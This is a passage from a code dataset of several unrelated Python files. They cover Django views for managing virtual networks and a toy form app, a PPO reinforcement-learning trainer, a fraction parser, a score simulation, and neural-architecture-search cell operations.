availability_zone = request.POST.get('availability-zone', None)\n dhcp = request.POST.get('dhcp', None)\n vnet_description = request.POST.get('vnet_description', None)\n\n hardwareHypervisor = PhysicalHardwareModel.objects.filter(ipAddress=availability_zone)\n if hardwareHypervisor.first():\n hardwareHypervisor = hardwareHypervisor.first()\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n hypervisor = HypervisorModel.objects.filter(hardware=hardwareHypervisor)\n hypervisor = hypervisor.first()\n vnat = NatNetworkModel(uuid_internal=str(uuid.uuid4()), name=vnet_name, subnet=vnet_subnet, lowerip=vnet_lower_ip, upperip=vnet_upper_ip, hostedOn=hypervisor,\n owner=request.user, dhcp=dhcp, description=vnet_description)\n vnat.save()\n \n middlware_server.Enqueue(hypervisor, vnat.create())\n\n return HttpResponseRedirect('/network')\n elif request.method == 'GET': \n debug = ''\n natNetworks = NatNetworkModel.objects.all()\n hypervisors = HypervisorModel.objects.filter(status='running')\n\n return render(request, 'app_bendis/vm_vnet_network_create.html', {'debug': debug, 'natNetworks': natNetworks, \n 'hypervisors': hypervisors })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n\n# URL: /create_network\n# ADD a vnet to a vm (atache)\n@ensure_user_auth\ndef controller_add_vnet(request, vm_name):\n if request.user.is_authenticated:\n error_msg = ''\n if request.method == 'POST':\n vnet_name = request.POST.get('vnet_name', '') \n natNetwork = NatNetworkModel.objects.filter(name=vnet_name)\n vm = VirtualMachineModel.objects.filter(name=vm_name)\n\n if vm.first():\n vm = vm.first()\n else:\n error_msg = 'No valid VM'\n if natNetwork.first():\n natNetwork = natNetwork.first()\n else:\n error_msg = 'No valid NatNetwork'\n \n if error_msg == '':\n vm.natNetworks.add(natNetwork)\n\n middlware_server.Enqueue(natNetwork.hostedOn, natNetwork.atache_virtual_machine(vm))\n\n return HttpResponseRedirect('/virtual_machines/') # Redirect after POST\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n\n\n# URL: /create_network\n#\n@ensure_user_auth\ndef controller_port_forword(request, vnet_name):\n if request.user.is_authenticated:\n debug = ''\n if request.method == 'POST':\n vnet_rule = request.POST.get('vnet_rule', '')\n\n vnet = NatNetworkModel.objects.filter(name=vnet_name)\n\n if vnet.first():\n vnet = vnet.first()\n middlware_server.Enqueue(vnet.hostedOn, vnet.add_portforward_rule(vnet_rule))\n\n return HttpResponseRedirect('/network/') # Redirect after POST\n\n elif request.method == 'GET':\n natNetworks = NatNetworkModel.objects.all()\n return render(request, 'app_bendis/vm_vnet_port_forword_create.html', {'debug': debug, 'vnet_name': vnet_name, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n\n# URL: /handler404\n#\ndef controller_handler404(request):\n response = render_to_response('shared/404_not_found.html', context_instance=RequestContext(request))\n response.status_code = 400\n return response\n\n\n# URL: /handler500\n#\ndef controller_handler500(request):\n response = render_to_response('shared/500_internal_error.html', context_instance=RequestContext(request))\n response.status_code = 500\n return 
response\n\n\n","sub_path":"apps/app_bendis/views/views_virtual_resource.py","file_name":"views_virtual_resource.py","file_ext":"py","file_size_in_byte":19228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"411327620","text":"import logging\nimport os\n\nimport numpy\nimport torch\n\nimport machine\nfrom machine.util import DictList, ReasonLabeler\nfrom machine.models import PolicyMapping, SigmoidTermination\nfrom machine.util.callbacks import EpisodeLogger\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass ReinforcementTrainer(object):\n \"\"\"\n The ReinforcementTrainer class helps in setting up a training framework for\n reinforcement learning.\n\n Largely inspired by babyAI repo code for PPOAlgo\n \"\"\"\n\n def __init__(self, envs, opt, model, model_name, obs, reshape_reward, algo_name='ppo', reasoning=False):\n self._trainer = f\"Reinforcement Trainer - algorithm: {algo_name}\"\n self._algo = algo_name\n self.env = envs\n self.preprocess_obss = obs\n self.reshape_reward = reshape_reward\n self.logger = logging.getLogger(__name__)\n self.model_path = os.path.join(opt.output_dir, model_name)\n if not os.path.exists(self.model_path):\n self.logger.info(f\"Created model path: {self.model_path}\")\n os.mkdir(self.model_path)\n\n # Copy command-line arguments to class\n self.frames = opt.frames\n self.frames_per_proc = opt.frames_per_proc\n self.num_procs = opt.num_processes\n self.discount = opt.gamma\n self.lr = opt.lr\n self.gae_lambda = opt.gae_lambda\n self.recurrence = opt.recurrence\n self.batch_size = opt.batch_size\n assert opt.batch_size % opt.recurrence == 0\n\n self.clip_eps = opt.clip_eps\n self.entropy_coef = opt.entropy_coef\n self.value_loss_coef = opt.value_loss_coef\n self.max_grad_norm = opt.max_grad_norm\n\n self.num_frames = self.frames_per_proc * self.num_procs\n assert self.frames_per_proc % opt.recurrence == 0\n\n # Arguments for disruptiveness\n self.explore_for = opt.explore_for\n self.disrupt_mode = opt.disrupt\n self.disrupt_coef = opt.disrupt_coef\n\n # Arguments for reasoning\n self.reasoning = reasoning\n if self.reasoning:\n self.delay_reason = opt.delay_reason\n self.sparse_reason = opt.sparse_diag\n self.reason_coef = opt.reason_coef\n self.reason_criterion = torch.nn.CrossEntropyLoss()\n if \"GoToObjThrees\" in opt.env_name:\n self.num_subtasks = 3\n else:\n self.num_subtasks = 2\n\n if \"GoTo\" in opt.env_name:\n replace_instruction = r\"go to (the|a)\"\n elif \"Pickup\" in opt.env_name:\n replace_instruction = r\"pick up (the|a)\"\n if \"Transfer\" in opt.env_name:\n transfer_type = int(opt.env_name.split(\"-\")[1][-1])\n else:\n transfer_type = None\n self.reason_labeler = ReasonLabeler(self.num_procs, self.num_subtasks, tt=transfer_type, replace_instr=replace_instruction)\n\n\n # Initialize observations\n self.obs, self.obs_info = self.env.reset()\n self.obss = [None] * self.frames_per_proc\n\n # Initialize log variables\n self.init_log_vars()\n\n # Initialize callbacks\n self.callback = EpisodeLogger(\n opt.print_every, opt.save_every, model_name, opt.tb, opt.explore_for, opt.reasoning)\n self.callback.set_trainer(self)\n\n # Set parameters for specific algorithms\n if algo_name == 'ppo':\n self.epochs = opt.ppo_epochs\n self.model = model\n self.model.train()\n self.optimizer = torch.optim.Adam(self.model.parameters(\n ), self.lr, (opt.beta1, opt.beta2), eps=opt.optim_eps)\n else:\n raise ValueError(\"Not a valid implemented RL algorithm!\")\n\n # Initialize 
experience matrices\n self.init_experience_matrices()\n\n self.logger.info(\n f\"Setup {self._trainer}, with model_name: {model_name}\")\n\n def collect_experiences(self, intrinsic_reward=False):\n \"\"\"\n Collect actions, observations and rewards over multiple concurrent\n environments.\n\n Taken from babyAI repo\n\n Args:\n intrinsic_reward (bool): Whether to use intrinsic motivation, in\n the form of the disruptiveness metric. If False, get reward\n from the environment and compute advantage.\n \"\"\"\n for i in range(self.frames_per_proc):\n # Do one agent-environment interaction\n preprocessed_obs = self.preprocess_obss(self.obs, device=device)\n with torch.no_grad():\n model_results = self.model(\n preprocessed_obs, self.memory * self.mask.unsqueeze(1))\n dist = model_results['dist']\n value = model_results['value']\n memory = model_results['memory']\n\n action = dist.sample()\n\n if self.reasoning and self.callback.cycle > self.delay_reason:\n # Save task status for every frame\n task_status = self.reason_labeler.annotate_status(self.obs, self.obs_info)\n self.task_status = task_status\n\n obs, reward, done, env_info = self.env.step(action.cpu().numpy())\n\n # Update experiences values\n self.update_memory(i, action, value, obs, reward, done)\n self.obs = obs\n self.obs_info = env_info\n self.memory = memory\n self.mask = 1 - \\\n torch.tensor(done, device=device, dtype=torch.float)\n\n # Update log values\n self.update_log_values(i, dist, action, reward, done)\n\n # Add advantage and return to experiences\n if intrinsic_reward:\n self.compute_disruptiveness()\n else:\n self.compute_advantage()\n\n if self.reasoning:\n # Fill in the correct reasons over the observed frames\n self.reasons = self.reason_labeler.compute_reasons(self.status, self.obs)\n\n # Flatten the data correctly, making sure that each episode's data is\n # a continuous chunk.\n exps = self.flatten_data()\n\n # Log some values\n log = self.log_output()\n\n return exps, log\n\n def update_model_parameters(self, exps, logs):\n \"\"\"\n Perform gradient update on the model using the gathered experience.\n\n Taken from babyAI repo\n \"\"\"\n for e_i in range(self.epochs):\n self.callback.on_epoch_begin(e_i)\n\n ask_reason = numpy.random.randint(0,self.recurrence)\n for inds in self._get_batches_starting_indexes():\n batch_logs = self.callback.on_batch_begin(None)\n batch_loss = 0\n\n memory = exps.memory[inds]\n\n for i in range(self.recurrence):\n # Create a sub-batch of experience\n sb = exps[inds + i]\n\n # Compute loss\n model_results = self.model(sb.obs, memory * sb.mask)\n dist = model_results['dist']\n value = model_results['value']\n memory = model_results['memory']\n\n disrupt_val = torch.tensor(1)\n if self.disrupt_mode > 0:\n if i < self.recurrence - 1:\n s1 = sb.obs.image\n s2 = exps[inds + i + 1].obs.image\n disrupt_val = torch.sum(\n s1 != s2, dtype=torch.float)\n disrupt_val = torch.log(disrupt_val)\n disrupt_val = torch.clamp(\n disrupt_val, min=.01, max=10)\n disrupt_val *= self.disrupt_coef\n\n entropy = dist.entropy().mean()\n ratio = torch.exp(dist.log_prob(\n sb.action) - sb.log_prob)\n surr1 = ratio * sb.advantage\n surr2 = torch.clamp(\n ratio, 1.0 - self.clip_eps, 1.0 + self.clip_eps) * sb.advantage\n policy_loss = -torch.min(surr1, surr2).mean()\n\n value_clipped = sb.value + \\\n torch.clamp(value - sb.value, -\n self.clip_eps, self.clip_eps)\n surr1 = (value - sb.returnn).pow(2)\n surr2 = (value_clipped - sb.returnn).pow(2)\n value_loss = torch.max(surr1, surr2).mean()\n\n if 
self.disrupt_mode == 1:\n                        loss = (policy_loss * disrupt_val) - self.entropy_coef * \\\n                            entropy + (self.value_loss_coef * value_loss)\n                    elif self.disrupt_mode == 2:\n                        loss = policy_loss - self.entropy_coef * \\\n                            entropy + (self.value_loss_coef *\n                                       (value_loss * disrupt_val))\n                    elif self.reasoning and self.callback.cycle > self.delay_reason and ((not self.sparse_reason) or ask_reason == i):\n                        a = sb.reasons.type(torch.long).to(device)\n                        zero_mask = (a >= 0).type(torch.long)\n                        val, idx = model_results['reason'].max(dim=1)\n                        if torch.sum(zero_mask) > 0:\n                            correct = torch.sum(a == idx).item()\n                            summ = torch.sum(zero_mask).item()\n                            acc = correct / summ\n                        else:\n                            acc = 0\n                        self.log_reason_correct.append(acc)\n                        rr = model_results['reason'].size()\n                        zz = zero_mask.repeat(rr[-1], 1).transpose(0,1)\n                        a1 = model_results['reason'].type(torch.float) * zz.type(torch.float)\n                        a2 = a * zero_mask\n                        reason_loss = self.reason_criterion(a1, a2)\n                        loss = policy_loss - self.entropy_coef * \\\n                            entropy + (self.value_loss_coef * value_loss) + \\\n                            self.reason_coef * reason_loss\n                    else:\n                        loss = policy_loss - self.entropy_coef * \\\n                            entropy + (self.value_loss_coef * value_loss)\n\n                    # Update loss\n                    batch_loss += loss\n\n                    # Update batch logging values\n                    batch_logs['entropy'] += entropy.item()\n                    batch_logs['value'] += value.mean().item()\n                    batch_logs['policy_loss'] += policy_loss.item()\n                    batch_logs['value_loss'] += value_loss.item()\n                    batch_logs['disrupt'] += disrupt_val.item()\n                    if self.reasoning and self.callback.cycle > self.delay_reason and ((not self.sparse_reason) or ask_reason == i):\n                        batch_logs['reason_loss'] += reason_loss.item()\n\n                    # Update memories for next epoch\n                    if i < self.recurrence - 1:\n                        exps.memory[inds + i + 1] = memory.detach()\n\n                # Update loss\n                batch_loss /= self.recurrence\n\n                # Update batch logging values\n                batch_logs['entropy'] /= self.recurrence\n                batch_logs['value'] /= self.recurrence\n                batch_logs['policy_loss'] /= self.recurrence\n                batch_logs['value_loss'] /= self.recurrence\n                batch_logs['disrupt'] /= self.recurrence\n                if self.reasoning:\n                    #use the same key as the 'reason_loss' accumulation above\n                    batch_logs['reason_loss'] /= self.recurrence\n\n                # Update actor-critic\n                self.optimizer.zero_grad()\n                batch_loss.backward()\n                grad_norm = sum(p.grad.data.norm(\n                    2) ** 2 for p in self.model.parameters() if p.grad is not None) ** 0.5\n                torch.nn.utils.clip_grad_norm_(\n                    self.model.parameters(), self.max_grad_norm)\n                self.optimizer.step()\n\n                # Update log values\n                batch_logs['grad_norm'] = grad_norm.item()\n                self.callback.on_batch_end(batch_loss.item(), batch_logs)\n            logs = self.callback.on_epoch_end(logs)\n        return logs\n\n    def train(self):\n        \"\"\"\n        Perform a series of training steps as configured.\n        \"\"\"\n        # Start training model\n        self.callback.on_train_begin()\n        num_frames = 0\n        while num_frames < self.frames:\n            self.callback.on_cycle_start()\n\n            # Create experiences and update the training status\n            exps, logs = self.collect_experiences(\n                intrinsic_reward=(num_frames < self.explore_for)\n            )\n\n            # Use experience to update policy\n            logs = self.update_model_parameters(exps, logs)\n\n            num_frames += logs['num_frames']\n            self.callback.on_cycle_end(logs)\n\n        self.callback.on_train_end()\n\n    def init_experience_matrices(self):\n        \"\"\"\n        Initialize matrices used in the storing of observations.\n        \"\"\"\n        shape = (self.frames_per_proc, self.num_procs)\n        if self._algo == 'ppo':\n            memsize = self.model.memory_size\n            self.memory = torch.zeros(shape[1], memsize, device=device)\n            self.memories = torch.zeros(*shape, memsize, device=device)\n        self.mask = 
torch.ones(shape[1], device=device)\n self.masks = torch.zeros(*shape, device=device)\n self.actions = torch.zeros(*shape, device=device, dtype=torch.int)\n self.values = torch.zeros(*shape, device=device)\n self.rewards = torch.zeros(*shape, device=device)\n self.advantages = torch.zeros(*shape, device=device)\n self.log_probs = torch.zeros(*shape, device=device)\n\n if self.reasoning:\n self.reason = torch.zeros(shape[1], device=device)\n self.reasons = torch.zeros(*shape, device=device)\n self.status = torch.zeros(*shape, self.num_subtasks, device=device)\n\n def init_log_vars(self):\n \"\"\"\n Initialize the variables used for logging training progress.\n \"\"\"\n self.log_episode_return = torch.zeros(self.num_procs, device=device)\n self.log_episode_reshaped_return = torch.zeros(\n self.num_procs, device=device)\n self.log_episode_num_frames = torch.zeros(\n self.num_procs, device=device)\n\n self.log_done_counter = 0\n self.log_return = [0] * self.num_procs\n self.log_reshaped_return = [0] * self.num_procs\n self.log_num_frames = [0] * self.num_procs\n if self.reasoning:\n self.task_status = torch.as_tensor([[0] * self.num_subtasks] * self.num_procs, dtype=torch.float)\n self.log_reason_correct = [0] * self.num_procs\n\n def update_memory(self, i, action, value, obs, reward, done):\n \"\"\"\n Update the memory matrices based on agent-environment interaction.\n \"\"\"\n self.obss[i] = self.obs\n self.memories[i] = self.memory\n self.masks[i] = self.mask\n self.actions[i] = action\n self.values[i] = value\n if self.reshape_reward is not None:\n self.rewards[i] = torch.tensor([\n self.reshape_reward(obs_, action_, reward_, done_)\n for obs_, action_, reward_, done_ in zip(obs, action, reward, done)\n ], device=device)\n else:\n self.rewards[i] = torch.tensor(reward, device=device)\n\n if self.reasoning:\n self.status[i,:,:] = self.task_status\n\n def update_log_values(self, i, dist, action, reward, done):\n \"\"\"\n Update the logging values used for keeping track of training progress.\n \"\"\"\n self.log_probs[i] = dist.log_prob(action)\n self.log_episode_return += torch.tensor(\n reward, device=device, dtype=torch.float)\n self.log_episode_reshaped_return += self.rewards[i]\n self.log_episode_num_frames += torch.ones(\n self.num_procs, device=device)\n\n for j, done_ in enumerate(done):\n if done_:\n self.log_done_counter += 1\n self.log_return.append(self.log_episode_return[j].item())\n self.log_reshaped_return.append(\n self.log_episode_reshaped_return[j].item())\n self.log_num_frames.append(self.log_episode_num_frames[j].item())\n\n self.log_episode_return *= self.mask\n self.log_episode_reshaped_return *= self.mask\n self.log_episode_num_frames *= self.mask\n\n def compute_advantage(self):\n \"\"\"\n Run the advantage estimation from [1].\n\n A_t = delta_t + (gamma * lambda) delta_(t+1) ...\n with\n delta_t = reward_t + gamma V(s_(t+1)) - V(s_t)\n\n [1]: Mnih et al. 
(2016) \"Asynchronous methods for deep reinforcement learning\"\n \"\"\"\n preprocessed_obs = self.preprocess_obss(self.obs, device=device)\n with torch.no_grad():\n next_value = self.model(\n preprocessed_obs, self.memory * self.mask.unsqueeze(1))['value']\n\n for i in reversed(range(self.frames_per_proc)):\n next_mask = self.masks[i + 1] if i < self.frames_per_proc - 1 else self.mask\n next_value = self.values[i + 1] if i < self.frames_per_proc - 1 else next_value\n next_advantage = self.advantages[i + 1] if i < self.frames_per_proc - 1 else 0\n\n delta = self.rewards[i] + self.discount * \\\n next_value * next_mask - self.values[i]\n self.advantages[i] = delta + self.discount * \\\n self.gae_lambda * next_advantage * next_mask\n\n def compute_disruptiveness(self):\n \"\"\"\n Compute an intrinsic reward based on the disruptiveness metric.\n \"\"\"\n preprocessed_obs = self.preprocess_obss(self.obs, device=device)\n with torch.no_grad():\n next_value = self.model(\n preprocessed_obs, self.memory * self.mask.unsqueeze(1))['value']\n\n for i in range(self.frames_per_proc):\n s_t = self.obss[i]\n s_t1 = self.obss[i +\n 1] if i < (self.frames_per_proc - 1) else self.obs\n\n # Binary difference\n state_t = torch.Tensor([s['image'] for s in s_t])\n state_t1 = torch.Tensor([s['image'] for s in s_t1])\n val = torch.nonzero(state_t - state_t1).size()[0]\n # Normalize over max change\n self.advantages[i] = val / (7 * 7 * self.num_procs)\n\n def flatten_data(self):\n \"\"\"\n Flatten the memory such that it is a continuous chunk of data. This is\n required by the PyTorch optimization step.\n \"\"\"\n exps = DictList()\n exps.obs = [self.obss[i][j]\n for j in range(self.num_procs)\n for i in range(self.frames_per_proc)]\n # In commments below T is self.frames_per_proc, P is self.num_procs,\n # D is the dimensionality\n # T x P x D -> P x T x D -> (P * T) x D\n exps.memory = self.memories.transpose(\n 0, 1).reshape(-1, *self.memories.shape[2:])\n # T x P -> P x T -> (P * T) x 1\n exps.mask = self.masks.transpose(0, 1).reshape(-1).unsqueeze(1)\n\n # for all tensors below, T x P -> P x T -> P * T\n exps.action = self.actions.transpose(0, 1).reshape(-1)\n exps.value = self.values.transpose(0, 1).reshape(-1)\n exps.reward = self.rewards.transpose(0, 1).reshape(-1)\n exps.advantage = self.advantages.transpose(0, 1).reshape(-1)\n exps.returnn = exps.value + exps.advantage\n exps.log_prob = self.log_probs.transpose(0, 1).reshape(-1)\n\n if self.reasoning:\n exps.reasons = self.reasons.transpose(0, 1).reshape(-1)\n\n # Preprocess experiences\n exps.obs = self.preprocess_obss(exps.obs, device=device)\n return exps\n\n def log_output(self):\n \"\"\"\n Create logging output based on the observed training progress.\n \"\"\"\n keep = max(self.log_done_counter, self.num_procs)\n log = {\n \"return_per_episode\": self.log_return[-keep:],\n \"reshaped_return_per_episode\": self.log_reshaped_return[-keep:],\n \"num_frames_per_episode\": self.log_num_frames[-keep:],\n \"num_frames\": self.num_frames,\n \"episodes_done\": self.log_done_counter,\n }\n\n self.log_done_counter = 0\n self.log_return = self.log_return[-self.num_procs:]\n self.log_reshaped_return = self.log_reshaped_return[-self.num_procs:]\n self.log_num_frames = self.log_num_frames[-self.num_procs:]\n if self.reasoning:\n log['correct_reasons'] = self.log_reason_correct[-keep:]\n self.log_reason_correct = self.log_reason_correct[-self.num_procs:]\n return log\n\n def _get_batches_starting_indexes(self):\n \"\"\"\n Gives, for each batch, the indexes of the 
observations given to\n the model and the experiences used to compute the loss at first.\n Returns\n -------\n batches_starting_indexes : list of list of int\n the indexes of the experiences to be used at first for each batch\n\n Taken from babyAI repo\n \"\"\"\n\n indexes = numpy.arange(0, self.num_frames, self.recurrence)\n indexes = numpy.random.permutation(indexes)\n\n num_indexes = self.batch_size // self.recurrence\n batches_starting_indexes = [indexes[i:i + num_indexes]\n for i in range(0, len(indexes), num_indexes)]\n\n return batches_starting_indexes","sub_path":"machine/trainer/reinforcement_trainer.py","file_name":"reinforcement_trainer.py","file_ext":"py","file_size_in_byte":21722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"95188141","text":"import re\n\nclass Amount:\n\n def transformDivision(self, teller, noemer):\n # print(\">\"+str(teller)+\"<\")\n # print(\">\"+str(noemer)+\"<\")\n result = round(teller / noemer, 4)\n return result\n\n def readDivision(self, string):\n # result = re.search(\"\\d\\s?\\/\\s?\\d\", string)\n result = re.split(\"\\/\", string)\n if re.match(\"\\s?\\d\\s?\", result[0]) and re.match(\"\\s?\\d\\s?\", result[1]):\n return self.transformDivision(int(result[0]), int(result[1]))\n else:\n print(\"geen breuk!\")\n\n","sub_path":"recipeConverter/Amount.py","file_name":"Amount.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"165150285","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\n\nimport json\nimport requests\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpRequest, HttpResponse\nfrom gy import models\nimport sys\n#reload(sys)\nsys.getdefaultencoding()\n#from .models import *\n# Create your views here.\n\ndef host_post(request):\n# from gy import models \n request.encoding='utf-8'\n #print(request.GET)\n if 'q' in request.GET:\n message = 'post is: ' + request.GET['q']\n #new_records=gyname(gyname_name=q)\n #new_records.save()\n result=type(request.GET['q'])\n result1=request.GET['q']\n models.gy.objects.create(name=result1)\n else:\n message = 'OK'\n return HttpResponse(message)\n\n\ndef index(request):\n return render(request, 'gy/contact.html')\n\n@csrf_exempt\ndef get_mas(request):\n if request.method == \"POST\":\n title = request.POST['title']\n username = request.POST['username']\n phone = request.POST['phone']\n email = request.POST['email']\n models.gy.objects.create(name=username)\n #return render(request, 'gy/table.html', {'title': title, 'username': username, 'phone': phone, 'email': email})\n return render(request, 'gy/contact.html')\n else:\n return HttpResponse('
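# Hedged variant of Amount.readDivision above: re.fullmatch with \d+ accepts
# multi-digit fractions ("12/34"), and rejects inputs like "1a/2" that the
# original prefix re.match lets through to int(), where they raise ValueError.
import re

def read_division(string):
    parts = re.split(r"/", string)
    if len(parts) == 2 and all(re.fullmatch(r"\s*\d+\s*", p) for p in parts):
        teller, noemer = int(parts[0]), int(parts[1])  # Dutch: numerator, denominator
        return round(teller / noemer, 4)
    print("geen breuk!")  # "not a fraction!", matching the original message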

非法操作!

')\n\n\n\ndef get_id(request,ID):\n name=models.gy.objects.get(id=int(ID))\n return HttpResponse(name.create_time)\n \n\n\ndef tijiao(request):\n if request.method == \"POST\":\n title = request.POST['title']\n username = request.POST['username']\n models.gy.objects.create(name=username)\n else:\n return HttpResponse('

非法操作!

')\n return render(request, 'gy/thanks.html')\n\n\ndef select(request):\n return render(request, 'gy/select.html')\n\ndef select2(request):\n name=models.gy.objects.get(id=4)\n if request.method == \"POST\":\n# title = request.POST['ds_name']\n # username = request.POST['ds_username']\n username = request.POST['select2']\n models.gy.objects.create(name=username)\n else:\n return HttpResponse('

非法操作!

')\n return render(request,'gy/thanks.html')\n\n\n\n\n\n\n\n","sub_path":"other/gy/j/gy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"439143907","text":"import random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nteamscore=[]\r\nfor i in range(100000):\r\n##player1\r\n p1mu=10\r\n p1sig=3\r\n p1score=random.gauss(p1mu,p1sig)\r\n##player2\r\n p2mu=10\r\n p2sig=3\r\n p2score=random.gauss(p2mu,p2sig)\r\n##player3\r\n p3mu=10\r\n p3sig=3\r\n p3score=random.gauss(p3mu,p3sig)\r\n##player4\r\n p4mu=10\r\n p4sig=3\r\n p4score=random.gauss(p4mu,p4sig)\r\n##player5\r\n p5mu=10\r\n p5sig=3\r\n p5score=random.gauss(p5mu,p5sig)\r\n##player6\r\n p6mu=10\r\n p6sig=3\r\n p6score=random.gauss(p6mu,p6sig)\r\n##player7\r\n p7mu=10\r\n p7sig=3\r\n p7score=random.gauss(p7mu,p7sig)\r\n##player8\r\n p8mu=10\r\n p8sig=3\r\n p8score=random.gauss(p8mu,p8sig)\r\n##player9\r\n p9mu=10\r\n p9sig=3\r\n p9score=random.gauss(p9mu,p9sig)\r\n##player10\r\n p10mu=10\r\n p10sig=3\r\n p10score=random.gauss(p10mu,p10sig)\r\n##player11\r\n p11mu=10\r\n p11sig=3\r\n p11score=random.gauss(p11mu,p11sig)\r\n\r\n teamscore.append(p1score+p2score+p3score+p4score+p5score+p6score+p7score+p8score+p9score+p10score+p11score)\r\n\r\nteamscorenp = np.array(teamscore)\r\nplt.hist(teamscorenp, normed ='True')\r\nplt.show()\r\n##for i in teamscore:\r\n\r\nprint(teamscorenp.mean())\r\nprint(teamscorenp.std())\r\n\r\n","sub_path":"simulation_letstry.py","file_name":"simulation_letstry.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"150942849","text":"##################################################\n# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2019 #\n##################################################\nimport torch\nimport torch.nn as nn\n\nfrom .cell_operations import ResNetBasicblock, Zero, Identity\nfrom .norm_modules import SandwichBatchNorm2d\n\n__all__ = [\"OPS\", \"ResNetBasicblock\"]\n\nOPS = {\n \"none\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: Zero(\n C_in, C_out, stride\n ),\n \"avg_pool_3x3\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: POOLING(\n C_in,\n C_out,\n stride,\n \"avg\",\n affine,\n track_running_stats,\n num_ops,\n num_prev_nodes,\n is_node_zero,\n ),\n \"nor_conv_3x3\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: ReLUConvBN(\n C_in,\n C_out,\n (3, 3),\n (stride, stride),\n (1, 1),\n (1, 1),\n affine,\n track_running_stats,\n num_ops,\n num_prev_nodes,\n is_node_zero,\n ),\n \"nor_conv_1x1\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: ReLUConvBN(\n C_in,\n C_out,\n (1, 1),\n (stride, stride),\n (0, 0),\n (1, 1),\n affine,\n track_running_stats,\n num_ops,\n num_prev_nodes,\n is_node_zero,\n ),\n \"skip_connect\": lambda C_in, C_out, stride, affine, track_running_stats, num_ops, num_prev_nodes, is_node_zero: Identity()\n if stride == 1 and C_in == C_out\n else FactorizedReduce(\n C_in,\n C_out,\n stride,\n affine,\n track_running_stats,\n num_ops,\n num_prev_nodes,\n is_node_zero,\n ),\n}\n\n\nclass ReLUConvBN(nn.Module):\n def __init__(\n self,\n C_in,\n C_out,\n kernel_size,\n stride,\n padding,\n dilation,\n affine,\n track_running_stats=True,\n 
num_prev_ops=1,\n num_prev_nodes=1,\n is_node_zero=False,\n ):\n super(ReLUConvBN, self).__init__()\n self.op = nn.Sequential(\n nn.ReLU(inplace=False),\n nn.Conv2d(\n C_in,\n C_out,\n kernel_size,\n stride=stride,\n padding=padding,\n dilation=dilation,\n bias=False,\n ),\n )\n self.bn = SandwichBatchNorm2d(\n C_out,\n affine=affine,\n track_running_stats=track_running_stats,\n num_prev_ops=num_prev_ops,\n num_prev_nodes=num_prev_nodes,\n is_node_zero=is_node_zero,\n )\n\n def forward(self, x, prev_op_idx=[0], first_layer=False):\n x = self.op(x)\n output = self.bn(x, prev_op_idx, first_layer)\n return output\n\n\nclass POOLING(nn.Module):\n def __init__(\n self,\n C_in,\n C_out,\n stride,\n mode,\n affine=True,\n track_running_stats=True,\n num_prev_ops=1,\n num_prev_nodes=1,\n is_node_zero=False,\n ):\n super(POOLING, self).__init__()\n if C_in == C_out:\n self.preprocess = None\n else:\n self.preprocess = ReLUConvBN(\n C_in,\n C_out,\n 1,\n 1,\n 0,\n 1,\n affine,\n track_running_stats,\n num_prev_ops=num_prev_ops,\n num_prev_nodes=num_prev_nodes,\n is_node_zero=is_node_zero,\n )\n if mode == \"avg\":\n self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)\n elif mode == \"max\":\n self.op = nn.MaxPool2d(3, stride=stride, padding=1)\n else:\n raise ValueError(\"Invalid mode={:} in POOLING\".format(mode))\n\n def forward(self, inputs, prev_op_idx=[0], first_layer=False):\n if self.preprocess:\n x = self.preprocess(inputs, prev_op_idx, first_layer)\n else:\n x = inputs\n return self.op(x)\n\n\nclass FactorizedReduce(nn.Module):\n def __init__(\n self,\n C_in,\n C_out,\n stride,\n affine,\n track_running_stats,\n num_prev_ops=1,\n num_prev_nodes=1,\n is_node_zero=False,\n ):\n super(FactorizedReduce, self).__init__()\n self.stride = stride\n self.C_in = C_in\n self.C_out = C_out\n self.relu = nn.ReLU(inplace=False)\n if stride == 2:\n C_outs = [C_out // 2, C_out - C_out // 2]\n self.convs = nn.ModuleList()\n for i in range(2):\n self.convs.append(\n nn.Conv2d(C_in, C_outs[i], 1, stride=stride, padding=0, bias=False)\n )\n self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)\n else:\n raise ValueError(\"Invalid stride : {:}\".format(stride))\n self.bn = SandwichBatchNorm2d(\n C_out,\n affine=affine,\n track_running_stats=track_running_stats,\n num_prev_ops=num_prev_ops,\n num_prev_nodes=num_prev_nodes,\n is_node_zero=is_node_zero,\n )\n\n def forward(self, x, prev_op_idx=[0], first_layer=False):\n x = self.relu(x)\n y = self.pad(x)\n out = torch.cat([self.convs[0](x), self.convs[1](y[:, :, 1:, 1:])], dim=1)\n out = self.bn(out, prev_op_idx, first_layer)\n return out\n\n def extra_repr(self):\n return \"C_in={C_in}, C_out={C_out}, 